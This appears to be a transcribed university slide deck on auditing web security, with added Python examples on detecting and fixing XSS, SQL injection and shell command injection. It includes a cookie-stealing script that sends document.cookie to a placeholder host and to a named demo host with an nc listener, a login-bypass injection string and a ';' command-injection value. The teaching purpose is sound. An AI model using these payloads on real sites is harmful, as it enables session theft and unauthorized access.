Published by Allison Paul. Modified over 9 years ago.
1
Auditing Web Security
2
Objectives
Understand the complexity of Web infrastructure and current trends in Web threats
Understand the mechanisms of, and defenses against, the major Web attacks: XSS, SQL injection and shell (command injection) attacks
3
Why Web Security: a Real Business Problem
> 60% of total attack attempts observed on the Net are against Web applications
> 80% of vulnerabilities discovered are in Web apps
Independent security audit
Regulatory compliance
4
Anatomy of Web Attacks
1. Attacker breaks into a legitimate website and posts malware
–Malware is no longer exclusive to malicious Web sites
2. Attacking end-user machines
–Malware on a Web site makes its way down onto a user's machine when that user visits the host Web site
–"Drive-by download": happens automatically, with no user interaction required
–Additional techniques do require some input from the user, but in practice are equally effective, if not more so
3. Leveraging end-user machines for malicious activity
5
Anatomy of Web Attacks (figure; source: Web Based Attacks, Symantec 2009)
6
Web Applications
Big trend: software as a (Web-based) service
–Online banking, shopping, government, etc.
–Cloud computing
Applications hosted on Web servers
–Written in a mixture of PHP, Java, Perl, Python, C, ASP
Security is rarely the main concern
–Poorly written scripts with inadequate input validation
–Sensitive data stored in world-readable files
7
Typical Web Application Design
Runs on a Web server or application server
Takes input from Web users (via the Web server)
Interacts with back-end databases and third parties
Prepares and outputs results for users (via the Web server)
–Dynamically generated HTML pages
–Contain content from many different sources, often including regular users
Blogs, social networks, photo-sharing websites…
Web advertisements, usually third party
–A web page can have content coming from 10-20 different domains
8
Two Sides of Web Security
Web browser (front end)
–Can be attacked by any website it visits
–Attacks lead to malware installation (keyloggers, botnets), document theft, loss of private data
Web application (back end)
–Runs at the website: banks, online merchants, blogs, Google Apps, etc.
–Written in JavaScript, PHP, ASP, JSP, Ruby, …
–Many potential bugs: XSS, SQL injection, XSRF
–Attacks lead to stolen credit cards, defaced sites, etc.
9
Chicago Tribune Home Page
10
How Are Legitimate Web Sites Compromised?
1. SQL injection attacks
2. Malicious advertisements
–Many Web sites today display advertisements hosted by third-party advertising sites
–The volume of ads published automatically makes detection difficult
–Ads rotate randomly, so a malicious one may not appear on every visit, which further complicates detection
3. Search engine result redirection
4. Attacks on the back-end virtual hosting companies
5. Cross-site scripting (XSS) attacks
6. Vulnerabilities in the Web server or forum hosting software (e.g., shell attacks)
12
JavaScript
Language executed by the browser
–Scripts are embedded in Web pages
–Can run before the HTML is loaded, before the page is viewed, while it is being viewed, or when leaving the page
Used to implement "active" web pages
–AJAX, a huge number of Web-based applications
Many security and correctness issues
–Attacker gets to execute some code on the user's machine
–Often used to exploit other vulnerabilities
13
Cross-Site Scripting
Attacker goal: get their code into the victim's browser
XSS forces a website visitor to execute malicious code in his/her browser, in the security context of the vulnerable site
Accounts for roughly 80% of all documented security vulnerabilities (as reported at the time of this deck)
14
XSS Risks
XSS abuses the browser's rendering engine or plug-ins by injecting script into a page the victim trusts
Steal browser cookies
Steal session info for a replay attack
Malware or bot installation
Redirect or phishing attempt
15
XSS Example 1
Trudy posts the following JavaScript on a message board (machineaddress is a placeholder for the host Trudy controls):
<script>
var url = "http://machineaddress:5000/index.html?cookie=" + encodeURI(document.cookie);
new Image().src = url;   // the browser requests the image URL, delivering the cookie to Trudy's listener
</script>
Then run a TCP server listening on port 5000, e.g., nc -l 5000
When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy
16
XSS Demo Instructions
Set up a port forward to bypass the firewall:
ssh -L 8000:netsec-demos:2000 guest@netsec-1.cs.northwestern.edu
Note: 8000 is the local port; it is forwarded to netsec-demos port 2000 through netsec-1
Use http://localhost:8000 to access http://netsec-demos.cs.northwestern.edu:2000
17
XSS Demo Instructions (II)
Log in as ychen and post the script with an attractive title (e.g., "hot game!"):
<script>
var url = "http://cal.cs.northwestern.edu:5000/index.html?cookie=";
url = url + encodeURI(document.cookie);
new Image().src = url;
</script>
Hi Everyone! Thanks for your cookies!
Ssh to that machine (e.g., cal.cs.northwestern.edu) and run nc -l 5000
18
Simple XSS Code
var url = "http://machineaddress:5000/index.html?cookie=" + encodeURI(document.cookie);
document.cookie is the browser's entire cookie string for the current website
–Cookies the server sets with the HttpOnly flag are not exposed to document.cookie, so they cannot be stolen this way (they can still be used by the script in requests it triggers)
encodeURI() is a JavaScript function that percent-encodes certain characters so the value can be included as part of a URL
–E.g., changing the space character to %20
–Makes the URL valid and less suspicious
19
What Can the Attacker Do with the Cookie?
When another user (e.g., test458) logs in and views the post, that user's cookie is sent to the attacker
Crack Bob's password (an MD5 hash stored in the cookie) with John the Ripper, Hydra, or any password cracker
For more info: http://netsec.cs.northwestern.edu/resources/password-cracking/
Use a Firefox plugin like Tamper Data to set your own cookies to the stolen values and impersonate Bob
20
XSS Detection
A client is not normally supposed to send scripts to the server
If the server receives <script>… (or its percent-encoded equivalent, e.g., %3Cscript%3E) in an incoming request and that same script is sent unsanitized in an outgoing response, then a reflection has occurred
–A sanitized version would look like &lt;SCRIPT&gt;… (the angle brackets HTML-encoded, so the browser renders text instead of running script)
–Caveat: attackers vary case, add whitespace, double-encode, or use event handlers and other tags instead of <script>, so matching must be done on the decoded value and a single signature is not sufficient
Any user input must be encoded for its output context before it is placed inside HTML
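The detection rule on this slide and the message-board scenario from the XSS example slides, worked as an added example (not code from the deck or from the miniBB demo board it uses): the request field is URL-decoded before matching, a double-encoded payload is still caught, and the same post rendered through an HTML-encoding template no longer reflects the script. The post body, the field names and the host attacker:5000 are constructed for the example, standing in for machineaddress:5000 on the slide.

```python
import html
import re
import urllib.parse

# Detection rule from the slide: a form submission is not supposed to carry a
# <script> tag, and if one that arrived in a request comes back unsanitized in
# the response, the application reflected it. Matching is done on the decoded
# value because the browser percent-encodes the POST body / query string.
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def decode_param(raw: str) -> str:
    """Undo the URL encoding a browser applies to a form field (one pass)."""
    return urllib.parse.unquote_plus(raw)


def inbound_carries_script(raw: str) -> bool:
    """True when the decoded field, or its double-decoded form, contains <script>."""
    once = decode_param(raw)
    twice = urllib.parse.unquote(once)      # catches %253Cscript%253E evasions
    return bool(SCRIPT_TAG.search(once) or SCRIPT_TAG.search(twice))


def reflected_unsanitized(raw: str, response_body: str) -> bool:
    """True when the script from the request reappears verbatim in the response."""
    return inbound_carries_script(raw) and decode_param(raw) in response_body


def audit_exchange(raw_params: dict, response_body: str) -> list:
    """Names of request fields whose script payload was reflected unsanitized."""
    return [name for name, raw in raw_params.items()
            if reflected_unsanitized(raw, response_body)]


def render_post_vulnerable(title: str, body: str) -> str:
    """Message-board template that pastes user text straight into the page."""
    return "<h2>%s</h2>\n<p>%s</p>" % (title, body)


def render_post_safe(title: str, body: str) -> str:
    """Same template with HTML encoding: <script> leaves as &lt;script&gt;."""
    return "<h2>%s</h2>\n<p>%s</p>" % (html.escape(title, quote=True),
                                       html.escape(body, quote=True))


# Constructed sample: Trudy's post as the browser would URL-encode it. The host
# attacker:5000 is a placeholder, like machineaddress:5000 on the slide.
TRUDY_BODY_RAW = ("%3Cscript%3Enew+Image().src%3D%22http%3A%2F%2Fattacker%3A5000"
                  "%2Findex.html%3Fcookie%3D%22%2BencodeURI(document.cookie)"
                  "%3C%2Fscript%3E")
TRUDY_POST = {"title": "hot+game%21", "body": TRUDY_BODY_RAW}

if __name__ == "__main__":
    title, body = decode_param(TRUDY_POST["title"]), decode_param(TRUDY_POST["body"])
    print("vulnerable template reflects:", audit_exchange(TRUDY_POST, render_post_vulnerable(title, body)))
    print("encoding template reflects:  ", audit_exchange(TRUDY_POST, render_post_safe(title, body)))
```

The check is deliberately narrow: it only recognises a `<script` tag, so an `<img onerror=...>` payload passes it. In practice the reliable control is the encoding template, not the signature.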
21
SQL Injection
Malicious SQL statements run on the database and thus attack the server itself
–XSS, by contrast, can only target other users
22
SQL Injection Example
Trudy accesses Bob's website, which does not validate input on its sign-in form
–The form runs a SQL statement like the following:
–select username, user_password from minibbtable_users where user_password = md5('johnspassword') and username='johndoe';
Set username to ' or '1'='1 (any password will do):
select username, user_password from minibbtable_users where user_password = md5('anyrandompassword') and username='' or '1'='1';
Effect: AND binds tighter than OR, so the condition reads (user_password = md5(...) and username = '') or '1'='1', which is true for every row; the query returns the whole user table and the login succeeds as whichever row the application reads first
Add "limit 1" to the injected string to pick just the first row
23
SQL Injection Detection and Defense
Validate every user-supplied value before it is embedded in a SQL statement sent from the web server to the database server
–Filter apostrophes, semicolons, percent symbols, hyphens, underscores, …
–Any character that has special meaning must be escaped, e.g., convert ' into \' (MySQL) or '' (standard SQL)
–Only works for string inputs
–Different databases have different escaping rules
–Check the data type (e.g., make sure it is an integer)
Preferred: parameterized (prepared) statements, so that user data is bound as a value and never reaches the SQL parser as code
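The sign-in query from the SQL injection example slide and the three defenses on this slide (escaping, type checking, and parameterization), worked as an added example against an in-memory SQLite table; this is not code from the deck or from miniBB. Assumptions: the table has two constructed accounts, and since SQLite has no md5() function the hash is computed in Python, which keeps the slide's behaviour (the password is hashed before it reaches the statement, so the injectable field is username).

```python
import hashlib
import re
import sqlite3


def md5_hex(value: str) -> str:
    """Stand-in for MySQL's md5(): SQLite has no md5 function, so hash in Python."""
    return hashlib.md5(value.encode()).hexdigest()


def make_demo_db() -> sqlite3.Connection:
    """In-memory copy of the miniBB users table with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table minibbtable_users (username text, user_password text)")
    conn.executemany("insert into minibbtable_users values (?, ?)",
                     [("johndoe", md5_hex("johnspassword")),
                      ("admin", md5_hex("s3cret"))])
    conn.commit()
    return conn


QUERY = ("select username, user_password from minibbtable_users "
         "where user_password = '%s' and username='%s'")


def login_vulnerable(conn, username: str, password: str) -> list:
    """The slide's sign-in query, assembled by string formatting: injectable."""
    rows = conn.execute(QUERY % (md5_hex(password), username))
    return [row[0] for row in rows]


def login_escaped(conn, username: str, password: str) -> list:
    """Escaping fallback: SQLite (and standard SQL) doubles the quote, MySQL also
    accepts a backslash. Database-specific, and only meaningful for strings."""
    rows = conn.execute(QUERY % (md5_hex(password), username.replace("'", "''")))
    return [row[0] for row in rows]


def login_parameterized(conn, username: str, password: str) -> list:
    """Preferred fix: placeholders keep user data out of the SQL parser entirely."""
    rows = conn.execute("select username, user_password from minibbtable_users "
                        "where user_password = ? and username = ?",
                        (md5_hex(password), username))
    return [row[0] for row in rows]


def user_by_id(conn, raw_id: str):
    """Type check for a numeric input: anything but ASCII digits is rejected
    before it can reach a query."""
    if not re.fullmatch(r"[0-9]+", raw_id):
        raise ValueError("user id must be an integer: %r" % raw_id)
    return conn.execute("select username from minibbtable_users where rowid = ?",
                        (int(raw_id),)).fetchone()


if __name__ == "__main__":
    db = make_demo_db()
    evil = "' or '1'='1"
    print("vulnerable:   ", login_vulnerable(db, evil, "anyrandompassword"))
    print("with limit 1: ", login_vulnerable(db, evil + "' limit 1 --", "anyrandompassword"))
    print("escaped:      ", login_escaped(db, evil, "anyrandompassword"))
    print("parameterized:", login_parameterized(db, evil, "anyrandompassword"))
```

The vulnerable version returns every user for the injected name, the `limit 1` variant returns exactly one, and both the escaped and the parameterized versions return nothing, because the whole string is compared as a username. The comment syntax (`--`) and the quote-doubling rule are SQLite's; MySQL needs a space after `--` and also accepts `\'`, which is the point of the "different databases" caveat above.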
24
Shell Attacks
The attacker runs commands on an actual machine, such as the web server itself
25
Shell Attacks
Inject commands into scripts that call Linux utilities
–E.g., with ";" as the command separator in UNIX/Linux shells
CGI programs (e.g., in Perl) often invoke command-line programs such as grep or ls
Unsanitized input passed as arguments on that command line leads to arbitrary command execution
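The CGI-style grep wrapper described on this slide, as an added example that is not code from the deck: the vulnerable function builds a command line that /bin/sh parses, the injected value uses ";" to start a second command and "#" to comment out the file name the script appends, and two fixes (an argv list with no shell, and shlex.quote when a shell is unavoidable) plus an allow-list check neutralise it. The log contents, the search script and the injected string are constructed; the example assumes a POSIX system with grep on the PATH.

```python
import os
import re
import shlex
import subprocess
import tempfile

# Constructed log file that the CGI-style search script greps through.
SAMPLE_LOG = (
    "2009-03-01 10:00:01 INFO  user alice logged in\n"
    "2009-03-01 10:00:07 ERROR login failed for bob\n"
    "2009-03-01 10:00:09 ERROR login failed for bob\n"
)


def write_sample_log() -> str:
    fd, path = tempfile.mkstemp(suffix=".log")
    with os.fdopen(fd, "w") as fh:
        fh.write(SAMPLE_LOG)
    return path


def _run(cmd, use_shell: bool) -> str:
    # stdin is closed so a grep left without a file argument cannot block on it.
    return subprocess.run(cmd, shell=use_shell, capture_output=True, text=True,
                          stdin=subprocess.DEVNULL).stdout


def search_vulnerable(pattern: str, path: str) -> str:
    """Perl-CGI style: the user's pattern is pasted into a command line for /bin/sh."""
    return _run("grep %s %s" % (pattern, path), True)


def search_quoted(pattern: str, path: str) -> str:
    """If a shell is unavoidable, shlex.quote makes ';' and friends literal text."""
    return _run("grep -- %s %s" % (shlex.quote(pattern), shlex.quote(path)), True)


def search_safe(pattern: str, path: str) -> str:
    """Preferred: an argv list and no shell. '--' stops grep reading the pattern as an option."""
    return _run(["grep", "--", pattern, path], False)


PATTERN_ALLOWED = re.compile(r"^[A-Za-z0-9_.-]+$")


def validate_pattern(pattern: str) -> str:
    """Allow-list check for the pattern parameter: shell metacharacters are rejected."""
    if not PATTERN_ALLOWED.match(pattern):
        raise ValueError("pattern contains characters outside the allow-list: %r" % pattern)
    return pattern


# Injected value: '/dev/null' gives the first grep a file so it exits quietly,
# ';' starts a second command, and '#' comments out the log path the script appends.
INJECTED = "x /dev/null; echo INJECTED #"

if __name__ == "__main__":
    log = write_sample_log()
    print("legit search:  %d matching lines" % search_vulnerable("ERROR", log).count("\n"))
    print("vulnerable:    %r" % search_vulnerable(INJECTED, log))
    print("shlex.quote:   %r" % search_quoted(INJECTED, log))
    print("argv list:     %r" % search_safe(INJECTED, log))
    os.unlink(log)
```

The argv-list form is the one to prefer: there is no shell to interpret the separator, so the whole string is handed to grep as a single pattern and simply fails to match.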
26
Defense Approaches
Web application firewall / IDS
–Open source: ModSecurity for Apache
–Commercial: SecureSphere from Imperva
Vulnerability scanning (these tools test the running application, not its source)
–Open source: Nikto
–Commercial: Acunetix Web Vulnerability Scanner, N-Stalker
Education on good coding
–HTML-encode untrusted data before it is placed into a page (server-side)
–Input validation/filtering
27
Getting onto a User's Computer (source: Web Based Attacks, Symantec 2009)
28
Automatic Attack Exposure
Techniques used to deliver malware from Web sites to a user's computer
Exposure
–Browsing a website
–No user interaction is required
–Executable content is automatically downloaded
29
Social Engineering (source: Web Based Attacks, Symantec 2009)
People are tricked into performing actions they would not otherwise want to perform
30
Types of Social Engineering Attacks
Fake codec
Malicious peer-to-peer (P2P) files
Malicious advertisements
Fake scanner Web page
Blog spam
Other attack vectors
31
Fake Codec
User is prompted to install a missing codec
The "codec" is actually malware
–Usually a trojan horse
32
Malicious Peer-to-Peer (P2P) Files
Malware authors bind malicious content into popular applications
–Files named after celebrities, popular bands
–Uploaded to popular P2P sites where they are downloaded by unsuspecting users
Openly available how-to materials on the Internet
–Detail how to build and distribute malware
–Pay-per-install malware
33
Fake Scanner Web Page (source: Web Based Attacks, Symantec 2009)
Create a web site or product that misrepresents the truth
–JavaScript pop-ups notifying the user of a false need to install operating system updates
–Tools that claim to scan for and remove adult images, etc.
34
Blog Spam
Alluring links posted on blogs
–Links embedded in blog comments
–Direct users to sites that leverage social engineering tricks or browser exploits to spread malware
35
Other Attack Vectors
Spam
–Emails contain links directing people to drive-by download, fake scanner/codec, and malware sites
Pirated software sites
–Pirated versions of software are bundled with, or consist solely of, trojan horses
36
Other Attack Vectors: Buffer Overflow
What is a buffer overflow?
Attackers typically break into a remote system by exploiting some vulnerability in its software: a programming or configuration bug that makes it possible to subvert the software and have it execute unplanned instructions
A buffer overflow occurs whenever a program writes more data into a buffer than the space allocated for it in memory. This lets an attacker overwrite adjacent data that controls the program's execution path (e.g., a saved return address) and hijack control of the program to execute the attacker's code instead of the process's own code
37
How to Protect Yourself
Update and patch software
–Get the latest OS, browser, and application patches
–Browser plug-in updates are often forgotten
Endpoint protection software
–Anti-virus software for signature-based detection and behavioral monitoring
–Keep the protection software's subscription updated: a week without signature updates could miss on the order of 70,000 new unique virus variants
Be suspicious
–Avoid things that seem too good to be true
–Use the safe-search functionality in browsers
Adopt a strong password policy